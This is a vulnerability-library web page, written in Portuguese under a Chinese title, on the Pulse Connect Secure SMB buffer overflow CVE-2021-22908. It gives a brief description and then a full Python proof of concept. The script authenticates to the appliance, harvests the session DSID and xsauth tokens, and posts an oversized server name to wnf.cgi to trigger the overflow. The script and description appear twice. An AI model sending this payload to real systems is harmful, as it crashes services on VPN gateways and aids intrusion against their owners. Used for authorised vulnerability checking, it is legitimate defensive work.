CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_pt

# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/pt

== Descrição da vulnerabilidade ==

Como o PCS oferece suporte à conexão com o compartilhamento de arquivos do Windows (SMB), a função é fornecida por scripts CGI baseados nas bibliotecas Samba 4.5.10 e aplicativos auxiliares. Ao especificar um nome de servidor longo para certas operações SMB, o aplicativo smbclt pode travar devido ao estouro do buffer, dependendo do comprimento do nome do servidor especificado.

Foi confirmado que o sistema PCS 9.1R11.4 tem esta vulnerabilidade. O endpoint CGI alvo é /dana/fb/smb/wnf.cgi . Outros endpoints CGI também podem desencadear esta vulnerabilidade.

Se um invasor não conseguir limpar depois de explorar com êxito esta vulnerabilidade, especificar um nome de servidor longo pode resultar nas seguintes entradas de log de eventos PCS:

Critical ERR31093 2021-05-24 14:05:37 - ive - [127.0.0.1] Root::System()[] - Program smbclt recently failed.

Pulse Connect Secure 9.0RX and 9.1RX

==POC==

#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass

parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname)')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')

args = parser.parse_args()

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class formvaluefinder(HTMLParser):
    def __init__(self, searchval):
        super(type (self), self).__init__()
        self.searchval = searchval
    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            # We're just looking for form  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'name'):
                    if(attr[1] == self.searchval):
                        foundelement = True
                elif(attr[0] == 'value' and foundelement == True):
                     self.data = attr[1]

class preauthfinder(HTMLParser):
    foundelement = False
    def handle_starttag(self, tag, attrs):
        if tag == 'textarea':
            # We're just looking for  tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'id'):
                    if(attr[1] == 'sn-preauth-text_2'):
                        self.foundelement = True
    def handle_data(self, data):
        if self.foundelement:
            self.data = data
            self.foundelement = False



def get_realm(host, defaulturi):
    realm = None
    print('Getting default realm for %s...' % host)
    url = 'https://%s%s' % (host,defaulturi)
    res = None
    try:
        res = requests.get(url, verify=False, timeout=10)
    except requests.exceptions.ConnectionError:
        print('Error retrieving %s' % url)

    if res:
        if res.status_code == 200:
            html = str(res.content)
            if 'sn-preauth-text_2' in html:
                print('Preauth required...')
                parser = preauthfinder()
                parser.feed(html)
                preauthtext = parser.data
                values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
                res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
                if res.content:
                    parser = formvaluefinder('realm')
                    parser.feed(str(res.content))
                    realm = parser.data
                else:
                    print('Error retrieving login page')

            else:
                parser = formvaluefinder('realm')
                parser.feed(html)
                realm = parser.data
    return realm

def get_dsid(host, defaulturi, realm, user, password):
    dsid = None
    loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
    url = 'https://%s%s' % (host,loginuri)
    values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
    res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
    if 'confirm' in res.headers['location']:
        # Redirect to "user-confirm" that they still want to log in, despite already
        # having an active session
        print('User session is already active! Proceeding...')
        res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
        parser = formvaluefinder('FormDataStr')
        parser.feed(str(res.content))
        formdata = parser.data
        values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value
    elif 'cred' in res.headers['location']:
        # This is a pulse that requires 2FA
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'id':
                key = cookie.value
        password2 = input('MFA code: ')
        values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
        cookies = {'id': key, 'DSSigninNotif': '1'}
        res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
        if 'confirm' in res.headers['location']:
            # Redirect to "user-confirm" that they still want to log in, despite already
            # having an active session
            print('User session is already active! Proceeding...')
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            parser = formvaluefinder('FormDataStr')
            parser.feed(str(res.content))
            formdata = parser.data
            values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
        else:
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
    elif 'failed' in res.headers['location']:
        print('Login failed!')
    else:
        # Login accepted
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value

    return dsid


def get_xsauth(host, dsid):
    xsauth = None
    url = 'https://%s/dana/home/index.cgi' % host
    cookies = {'DSID':dsid}
    res = requests.get(url, verify=False, cookies=cookies, timeout=10)
    if 'xsauth' in str(res.content):
        parser = formvaluefinder('xsauth')
        parser.feed(str(res.content))
        xsauth = parser.data
    else:
        print('Cannot find xsauth string for provided DSID: %s' % dsid)
    return xsauth

def trigger_vul(host, dsid, xsauth):
    url = 'https://%s/dana/fb/smb/wnf.cgi' % host
    values = {
        't': 's',
        'v': '%s,,' % ('A' * 1800),
        'dir': 'tmp',
        'si': None,
        'ri': None,
        'pi': None,
        'confirm': 'yes',
        'folder': 'tmp',
        'acttype': 'create',
        'xsauth': xsauth,
        'create': 'Create Folder',
        }
    cookies = {'DSID': dsid}
    try:
        res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
        status = res.status_code
        if 'DSIDFormDataStr' in str(res.content):
            # We got page asking to confirm our action
            print('xsauth value was not accepted')
        else:
            if status == 200 and 'Error FB-8' in str(res.content):
                print('HTTP %s.  Windows File Access Policies prevents exploitation.' % status)
            elif status == 200:
                print('HTTP %s.  Not vulnerable.' % status)
            elif status == 403:
                print('HTTP %s.  XML workaround applied.' % status)
            elif status == 500:
                print('HTTP %s.  %s is vulnerable to CVE-2021-22908!' % (status, host))
            elif status == 302:
                print('HTTP %s.  Are you sure your DSID is valid?' % host)
            else:
                print('HTTP %s.  Not sure how to interpret this result.' % status)
    except requests.exceptions.ReadTimeout:
        print('No response from server. Try again...')


def get_default(host):
    url = 'https://%s' % host
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    try:
        location = res.headers['location']
        if 'dana-na' not in location:
            print('%s does not seem to be a PCS host' % host)
            location = None
    except:
        pass
    return location

def check_xml(host):
    url = 'https://%s/dana/meeting' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2104 appears to be installed')
    else:
        print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')

    url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2105 appears to be installed')
    else:
        print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')


host = args.host
if args.noauth:
    check_xml(host)
else:
    defaulturi = get_default(host)
    if defaulturi:

        if not args.realm:
            realm = get_realm(host, defaulturi)
        else:
            realm = args.realm

        if realm:
            print('Realm: %s' % realm)
            if not args.user and not args.dsid:
                user = input('User: ')
            else:
                user = args.user
            if not args.password and not args.dsid:
                password = getpass.getpass()
            else:
                password = args.password
            if not args.dsid:
                dsid = get_dsid(host, defaulturi, realm, user, password)
                print('DSID: %s' % dsid)
            else:
                dsid = args.dsid
            if dsid:
                if not args.xsauth:
                    xsauth = get_xsauth(host, dsid)
                    print('xsauth: %s' % xsauth)
                else:
                    xsauth = args.xsauth
                if xsauth:
                    trigger_vul(host, dsid, xsauth)
</pre>
<div lang="chinese" dir="ltr" class="mw-content-ltr">
==參考==
</div>
<p>https://short.pwnwiki.org/?c=1NiPen</p>
<p>https://short.pwnwiki.org/?c=2Um6Rb<languages  /><br />
== Descrição da vulnerabilidade ==</p>
<p>Como o PCS oferece suporte à conexão com o compartilhamento de arquivos do Windows (SMB), a função é fornecida por scripts CGI baseados nas bibliotecas Samba 4.5.10 e aplicativos auxiliares. Ao especificar um nome de servidor longo para certas operações SMB, o aplicativo smbclt pode travar devido ao estouro do buffer, dependendo do comprimento do nome do servidor especificado.</p>
<p>Foi confirmado que o sistema PCS 9.1R11.4 tem esta vulnerabilidade. O endpoint CGI alvo é <code>/dana/fb/smb/wnf.cgi </code>. Outros endpoints CGI também podem desencadear esta vulnerabilidade.</p>
<p>Se um invasor não conseguir limpar depois de explorar com êxito esta vulnerabilidade, especificar um nome de servidor longo pode resultar nas seguintes entradas de log de eventos PCS:</p>
<pre>
Critical ERR31093 2021-05-24 14:05:37 - ive - [127.0.0.1] Root::System()[] - Program smbclt recently failed.
</pre>
<p>Mas para explorar esta vulnerabilidade, o servidor PCS deve ter uma política de acesso a arquivos do Windows que permita \\ * ou outra política que permita que um invasor se conecte a qualquer servidor. Você pode visualizar a política SMB atual visualizando Usuário-> Política de Recursos-> Política de Acesso a Arquivos do Windows na página de gerenciamento do PCS. 9.1R2 e dispositivos PCS anteriores usam a política padrão de permitir conexões com qualquer host SMB. A partir de 9.1R3, esta política foi alterada da permissão padrão para a rejeição padrão.</p>
<p>== Âmbito de influência ==<br />
Pulse Connect Secure 9.0RX and 9.1RX</p>
<p>==POC==</p>
<pre>
#!/usr/bin/env python3
# Utility to check for Pulse Connect Secure CVE-2021-22908
# https://www.kb.cert.org/vuls/id/667933

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import argparse
import sys
from html.parser import HTMLParser
import getpass

parser = argparse.ArgumentParser(description='Pulse Connect Secure CVE-2021-22908')
parser.add_argument('host', type=str, help='PCS IP or hostname)')
parser.add_argument('-u', '--user', dest='user', type=str, help='username')
parser.add_argument('-p', '--pass', dest='password', type=str, help='password')
parser.add_argument('-r', '--realm', dest='realm', type=str, help='realm')
parser.add_argument('-d', '--dsid', dest='dsid', type=str, help='DSID')
parser.add_argument('-x', '--xsauth', dest='xsauth', type=str, help='xsauth')
parser.add_argument('-n', '--noauth', action='store_true', help='Do not authenticate. Only check for XML workaround')

args = parser.parse_args()

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

class formvaluefinder(HTMLParser):
    def __init__(self, searchval):
        super(type (self), self).__init__()
        self.searchval = searchval
    def handle_starttag(self, tag, attrs):
        if tag == 'input':
            # We're just looking for form <input> tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'name'):
                    if(attr[1] == self.searchval):
                        foundelement = True
                elif(attr[0] == 'value' and foundelement == True):
                     self.data = attr[1]

class preauthfinder(HTMLParser):
    foundelement = False
    def handle_starttag(self, tag, attrs):
        if tag == 'textarea':
            # We're just looking for <textarea> tags
            foundelement = False
            for attr in attrs:
                if(attr[0] == 'id'):
                    if(attr[1] == 'sn-preauth-text_2'):
                        self.foundelement = True
    def handle_data(self, data):
        if self.foundelement:
            self.data = data
            self.foundelement = False



def get_realm(host, defaulturi):
    realm = None
    print('Getting default realm for %s...' % host)
    url = 'https://%s%s' % (host,defaulturi)
    res = None
    try:
        res = requests.get(url, verify=False, timeout=10)
    except requests.exceptions.ConnectionError:
        print('Error retrieving %s' % url)

    if res:
        if res.status_code == 200:
            html = str(res.content)
            if 'sn-preauth-text_2' in html:
                print('Preauth required...')
                parser = preauthfinder()
                parser.feed(html)
                preauthtext = parser.data
                values = {'sn-preauth-text': preauthtext, 'sn-preauth-proceed': 'Proceed'}
                res = requests.post(res.url, data=values, verify=False, allow_redirects=False, timeout=10)
                if res.content:
                    parser = formvaluefinder('realm')
                    parser.feed(str(res.content))
                    realm = parser.data
                else:
                    print('Error retrieving login page')

            else:
                parser = formvaluefinder('realm')
                parser.feed(html)
                realm = parser.data
    return realm

def get_dsid(host, defaulturi, realm, user, password):
    dsid = None
    loginuri = defaulturi.replace('welcome.cgi', 'login.cgi')
    url = 'https://%s%s' % (host,loginuri)
    values = {'username': user, 'password': password, 'realm': realm, 'btnSubmit': 'Sign In'}
    res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
    if 'confirm' in res.headers['location']:
        # Redirect to "user-confirm" that they still want to log in, despite already
        # having an active session
        print('User session is already active! Proceeding...')
        res = requests.post(url, data=values, verify=False, allow_redirects=True, timeout=10)
        parser = formvaluefinder('FormDataStr')
        parser.feed(str(res.content))
        formdata = parser.data
        values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value
    elif 'cred' in res.headers['location']:
        # This is a pulse that requires 2FA
        res = requests.post(url, data=values, verify=False, allow_redirects=False, timeout=10)
        for cookie in res.cookies:
            if cookie.name == 'id':
                key = cookie.value
        password2 = input('MFA code: ')
        values = {'key': key, 'password#2': password2, 'btnSubmit': 'Sign In'}
        cookies = {'id': key, 'DSSigninNotif': '1'}
        res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
        if 'confirm' in res.headers['location']:
            # Redirect to "user-confirm" that they still want to log in, despite already
            # having an active session
            print('User session is already active! Proceeding...')
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            parser = formvaluefinder('FormDataStr')
            parser.feed(str(res.content))
            formdata = parser.data
            values = {'btnContinue' : 'Continue the session', 'FormDataStr': formdata}
            res = requests.post(url, data=values, cookies=cookies, verify=False, allow_redirects=False, timeout=10)
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
        else:
            for cookie in res.cookies:
                if cookie.name == 'DSID':
                    dsid = cookie.value
    elif 'failed' in res.headers['location']:
        print('Login failed!')
    else:
        # Login accepted
        for cookie in res.cookies:
            if cookie.name == 'DSID':
                dsid = cookie.value

    return dsid


def get_xsauth(host, dsid):
    xsauth = None
    url = 'https://%s/dana/home/index.cgi' % host
    cookies = {'DSID':dsid}
    res = requests.get(url, verify=False, cookies=cookies, timeout=10)
    if 'xsauth' in str(res.content):
        parser = formvaluefinder('xsauth')
        parser.feed(str(res.content))
        xsauth = parser.data
    else:
        print('Cannot find xsauth string for provided DSID: %s' % dsid)
    return xsauth

def trigger_vul(host, dsid, xsauth):
    url = 'https://%s/dana/fb/smb/wnf.cgi' % host
    values = {
        't': 's',
        'v': '%s,,' % ('A' * 1800),
        'dir': 'tmp',
        'si': None,
        'ri': None,
        'pi': None,
        'confirm': 'yes',
        'folder': 'tmp',
        'acttype': 'create',
        'xsauth': xsauth,
        'create': 'Create Folder',
        }
    cookies = {'DSID': dsid}
    try:
        res = requests.post(url, data=values, verify=False, allow_redirects=False, cookies=cookies, timeout=60)
        status = res.status_code
        if 'DSIDFormDataStr' in str(res.content):
            # We got page asking to confirm our action
            print('xsauth value was not accepted')
        else:
            if status == 200 and 'Error FB-8' in str(res.content):
                print('HTTP %s.  Windows File Access Policies prevents exploitation.' % status)
            elif status == 200:
                print('HTTP %s.  Not vulnerable.' % status)
            elif status == 403:
                print('HTTP %s.  XML workaround applied.' % status)
            elif status == 500:
                print('HTTP %s.  %s is vulnerable to CVE-2021-22908!' % (status, host))
            elif status == 302:
                print('HTTP %s.  Are you sure your DSID is valid?' % host)
            else:
                print('HTTP %s.  Not sure how to interpret this result.' % status)
    except requests.exceptions.ReadTimeout:
        print('No response from server. Try again...')


def get_default(host):
    url = 'https://%s' % host
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    try:
        location = res.headers['location']
        if 'dana-na' not in location:
            print('%s does not seem to be a PCS host' % host)
            location = None
    except:
        pass
    return location

def check_xml(host):
    url = 'https://%s/dana/meeting' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2104 appears to be installed')
    else:
        print('Workaround-2104 does NOT seem to be installed. Hope you are on R11.4 or later!')

    url = 'https://%s/dana-cached/fb/smb/wfmd.cgi' % host
    #print('Checking status of %s ...' % url)
    res = requests.get(url, verify=False, allow_redirects=False, timeout=10)
    if res.status_code == 403:
        print('Workaround-2105 appears to be installed')
    else:
        print('Workaround-2105 does NOT seem to be installed. Hope you are on R11.5 or later!')


host = args.host
if args.noauth:
    check_xml(host)
else:
    defaulturi = get_default(host)
    if defaulturi:

        if not args.realm:
            realm = get_realm(host, defaulturi)
        else:
            realm = args.realm

        if realm:
            print('Realm: %s' % realm)
            if not args.user and not args.dsid:
                user = input('User: ')
            else:
                user = args.user
            if not args.password and not args.dsid:
                password = getpass.getpass()
            else:
                password = args.password
            if not args.dsid:
                dsid = get_dsid(host, defaulturi, realm, user, password)
                print('DSID: %s' % dsid)
            else:
                dsid = args.dsid
            if dsid:
                if not args.xsauth:
                    xsauth = get_xsauth(host, dsid)
                    print('xsauth: %s' % xsauth)
                else:
                    xsauth = args.xsauth
                if xsauth:
                    trigger_vul(host, dsid, xsauth)
</pre>
<p>== Referência ==<br />
https://short.pwnwiki.org/?c=1NiPen</p>
<p>https://short.pwnwiki.org/?c=2Um6Rb</p>
                    </div>
        <div class="em09 muted-3-color"><div><span>©</span> 版权声明</div><div class="posts-copyright">文章版权归作者所有，未经允许请勿转载。</div></div><div class="text-center theme-box muted-3-color box-body separator em09">THE END</div><div class="theme-box article-tags"><a class="but ml6 radius c-blue" title="查看更多分类文章" href="https://vip.bdziyi.com/category/ldxq/"><i class="fa fa-folder-open-o" aria-hidden="true"></i>漏洞库</a><br></div>    </div>
    <div class="text-center muted-3-color box-body em09">喜欢就支持一下吧</div><div class="text-center post-actions"><a href="javascript:;" data-action="like" class="action action-like" data-pid="2491"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-like"></use></svg><text>点赞</text><count>0</count></a><a href="javascript:;" data-toggle="modal" data-target="#rewards-modal-1" data-remote="https://vip.bdziyi.com/wp-admin/admin-ajax.php?id=1&action=user_rewards_modal" class="rewards action action-rewards"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-money"></use></svg><text>赞赏</text></a><span class="hover-show dropup action action-share">
        <svg class="icon" aria-hidden="true"><use xlink:href="#icon-share"></use></svg><text>分享</text><div class="zib-widget hover-show-con share-button dropdown-menu"><div><a rel="nofollow" class="share-btn qzone"  target="_blank" title="QQ空间" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=https://vip.bdziyi.com/2491/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_pt-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&summary=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/pt == Descrição da vulnerabilidade == Como o PCS oferece suporte à conexão com o compartilhamento de arquivos do Windows (SMB), a função é fornecida por scripts CGI baseados nas bibliotecas Samba 4.5.10 e aplicativos auxiliares. Ao especificar um nome de ser..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qzone-color"></use></svg></icon><text>QQ空间<text></a><a rel="nofollow" class="share-btn weibo"  target="_blank" title="微博" href="https://service.weibo.com/share/share.php?url=https://vip.bdziyi.com/2491/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_pt-棉花糖会员站&pic=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&searchPic=false"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-weibo-color"></use></svg></icon><text>微博<text></a><a rel="nofollow" class="share-btn qq"  target="_blank" title="QQ好友" href="https://connect.qq.com/widget/shareqq/index.html?url=https://vip.bdziyi.com/2491/&title=CVE-2021-22908_Pulse_Connect_Secure_任意代碼執行漏洞_pt-棉花糖会员站&pics=https://oss.bdziyi.com/vip/2024/03/20240324135327296.jpg&desc=# CVE-2021-22908 Pulse Connect Secure 任意代碼執行漏洞/pt == Descrição da vulnerabilidade == Como o PCS oferece suporte à conexão com o compartilhamento de arquivos do Windows (SMB), a função é fornecida por scripts CGI baseados nas bibliotecas Samba 4.5.10 e aplicativos auxiliares. Ao especificar um nome de ser..."><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-color"></use></svg></icon><text>QQ好友<text></a><a rel="nofollow" class="share-btn poster" poster-share="2491" title="海报分享" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-poster-color"></use></svg></icon><text>海报分享<text></a><a rel="nofollow" class="share-btn copy" data-clipboard-text="https://vip.bdziyi.com/2491/" data-clipboard-tag="链接" title="复制链接" href="javascript:;"><icon><svg class="icon" aria-hidden="true"><use xlink:href="#icon-copy-color"></use></svg></icon><text>复制链接<text></a></div></div></span><a href="javascript:;" class="action action-favorite signin-loader" data-pid="2491"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-favorite"></use></svg><text>收藏</text><count></count></a></div></article><div class="yiyan-box main-bg theme-box text-center box-body radius8 main-shadow"><div data-toggle="tooltip" data-original-title="点击切换一言" class="yiyan"></div></div><div class="user-card zib-widget author">
        <div class="card-content mt10 relative">
            <div class="user-content">
                
                <div class="user-avatar"><a href="https://vip.bdziyi.com/author/1/"><span class="avatar-img avatar-lg"><img alt="棉花糖的头像-棉花糖会员站" src="https://oss.bdziyi.com/vip/2024/10/20241011084359492.jpg" data-src="//oss.bdziyi.com/vip/2024/03/20240324112603946-150x150.jpg" class="lazyload avatar avatar-id-1"><img class="lazyload avatar-badge" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/vip-1.svg" data-toggle="tooltip" title="糖心会员" alt="糖心会员"></span></a></div>
                <div class="user-info mt20 mb10">
                    <div class="user-name flex jc"><name class="flex1 flex ac"><a class="display-name text-ellipsis " href="https://vip.bdziyi.com/author/1/">棉花糖</a><icon data-toggle="tooltip" title="站长" class="user-auth-icon ml3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-auth"></use></svg></icon><img  class="lazyload ml3 img-icon medal-icon" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://vip.bdziyi.com/wp-content/themes/zibll/img/medal/medal-28.svg" data-toggle="tooltip" title="年度发烧元老"  alt="徽章-年度发烧元老-棉花糖会员站"><img  class="lazyload img-icon ml3" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail-null.svg" data-src="https://oss.bdziyi.com/vip/2024/09/20240921093141389.png" data-toggle="tooltip" title="LV7" alt="等级-LV7-棉花糖会员站"><a href="javascript:;" class="focus-color ml10 follow flex0 signin-loader" data-pid="1"><count><i class="fa fa-heart-o mr3" aria-hidden="true"></i>关注</count></a></name></div>
                    <div class="author-tag mt10 mini-scrollbar"><a class="but c-blue-2 tag-forum-post" data-toggle="tooltip" title="共8篇帖子" href="https://vip.bdziyi.com/author/1/?tab=forum"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-posts"></use></svg>8</a><a class="but c-blue tag-posts" data-toggle="tooltip" title="共1.3W+篇文章" href="https://vip.bdziyi.com/author/1/"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-post"></use></svg>1.3W+</a><a class="but c-green tag-comment" data-toggle="tooltip" title="共960条评论" href="https://vip.bdziyi.com/author/1/?tab=comment"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-comment"></use></svg>960</a><a class="but c-yellow tag-follow" data-toggle="tooltip" title="共353个粉丝" href="https://vip.bdziyi.com/author/1/?tab=follow"><i class="fa fa-heart em09"></i>353</a><span class="badg c-red tag-view" data-toggle="tooltip" title="人气值 171W+"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hot"></use></svg>171W+</span></div>
                    <div class="user-desc mt10 muted-2-color em09">公众号：棉花糖fans</div>
                    
                </div>
            </div>
            <div class="swiper-container more-posts swiper-scroll"><div class="swiper-wrapper"><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/77/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/11/20241126051508458.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="会员必看手册（1.8.8版本 25.12.12更新）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">会员必看手册（1.8.8版本 25.12.12更新）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">会员必看手册（1.8.8版本 25.12.12更新）</div><div class="px12 opacity8 mt6"><item>2025年12月1日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3.8W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/57589/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/biji/202506011606395.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="mingdon 明动 burp插件0.2.6版本 本地时间校验去除版-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">mingdon 明动 burp插件0.2.6版本 本地时间校验去除版</div><div class="px12 opacity8 mt6"><item>2025年7月3日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 1.5W+</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/53919/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2025/03/20250310133450331.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="独家!超强代码审计工具上线！免费会员等你来嫖！-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">独家!超强代码审计工具上线！免费会员等你来嫖！</div><div class="px12 opacity8 mt6"><item>2024年12月17日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 8569</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/58468/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401083217388.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="2025 hw 有poc的漏洞集合-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">2025 hw 有poc的漏洞集合</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">2025 hw 有poc的漏洞集合</div><div class="px12 opacity8 mt6"><item>2025年7月31日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 6326</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/129/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/03/20240626133442218.png" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="技术文章投稿兑换会员规则-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">技术文章投稿兑换会员规则</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">技术文章投稿兑换会员规则</div><div class="px12 opacity8 mt6"><item>2024年3月25日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 4558</item></div></div></div></a></div><div class="swiper-slide mr10"><a href="https://vip.bdziyi.com/10860/"><div class="graphic hover-zoom-img em09 style-3" style="padding-bottom: 70%!important;"><img class="fit-cover lazyload" data-src="https://oss.bdziyi.com/vip/2024/04/20240401084118281.jpg" src="https://vip.bdziyi.com/wp-content/themes/zibll/img/thumbnail.svg" alt="王老师src真正的完整版（49个学生分享视频版本）-棉花糖会员站"><div class="abs-center left-bottom graphic-text text-ellipsis">王老师src真正的完整版（49个学生分享视频版本）</div><div class="abs-center left-bottom graphic-text"><div class="em09 opacity8">王老师src真正的完整版（49个学生分享视频版本）</div><div class="px12 opacity8 mt6"><item>2024年6月8日</item><item class="pull-right"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-view"></use></svg> 3749</item></div></div></div></a></div></div><div class="swiper-button-prev"></div><div class="swiper-button-next"></div></div>
        </div>
    </div>    <div class="theme-box" style="height:99px">
        <nav class="article-nav">
            <div class="main-bg box-body radius8 main-shadow">
                <a href="https://vip.bdziyi.com/2207/">
                    <p class="muted-2-color"><i class="fa fa-angle-left em12"></i><i
                            class="fa fa-angle-left em12 mr6"></i>上一篇</p>
                    <div class="text-ellipsis-2">
                        JD-FreeFuck_後台命令執行漏洞_es                    </div>
                </a>
            </div>
            <div class="main-bg box-body radius8 main-shadow">
